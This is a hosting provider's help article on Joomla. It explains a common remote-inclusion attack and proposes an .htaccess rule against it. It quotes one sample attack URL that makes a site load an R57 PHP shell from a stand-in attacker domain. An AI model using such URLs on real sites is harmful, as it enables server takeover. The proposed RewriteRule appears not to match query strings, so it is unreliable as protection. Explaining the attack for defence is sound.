How to redirect string variations to a specific URL in Joomla?

One of the most common break-in attempts in Joomla is by appending a string onto a URL, which in effect attempts to run some malicious script remotely. This method is known as a command injection attack. In most cases, this takes the form of the following URL in the access logs:

//?mosConfig_absolute_path=http://www.attackersdomain.com/some_folder/R57.txt???

 

The R57.txt??? part is a .php shell script. The purpose of this attack is to have the PHP shell script executed on your web server, giving the attacker control over various parts of your website.

 

In order to redirect any requests containing the character string "R57.txt???" to your main page at http://www.yourdomain.com, you have to open your .htaccess file and add the following lines in it:

 

# redirect any variations of a specific character string to a specific address

RewriteRule ^R57.txt http://www.yourdomain.com/ [R]

Joomla is a powerful software that is easy to work with once you have the right host to support you. Before you lose any more time with the wrong host, check out the SiteGround Joomla hosting offer.

  • 0 Users Found This Useful
Was this answer helpful?

Related Articles

How to test if jHackGuard is working correctly on your Joomla site?

If you want to be sure that jHackGuard is installed and working correctly on your website, you...

How to remove time stamps from Joomla SEF URLs

Due to an incorrect alias or a non-English character in your category names, Joomla may replace...

How to configure AcyMailing to comply with hostlantern e-mail terms of use?

In order to comply with the SiteGround e-mail Terms of Service you have to configure your...

Joomla caching

The caching mechanism implemented in Joomla is a way to improve the performance and loading speed...

How to extract and restore a Joomla .jpa archive or backup?

Upload your .jpa archive in public_html through your FTP client:...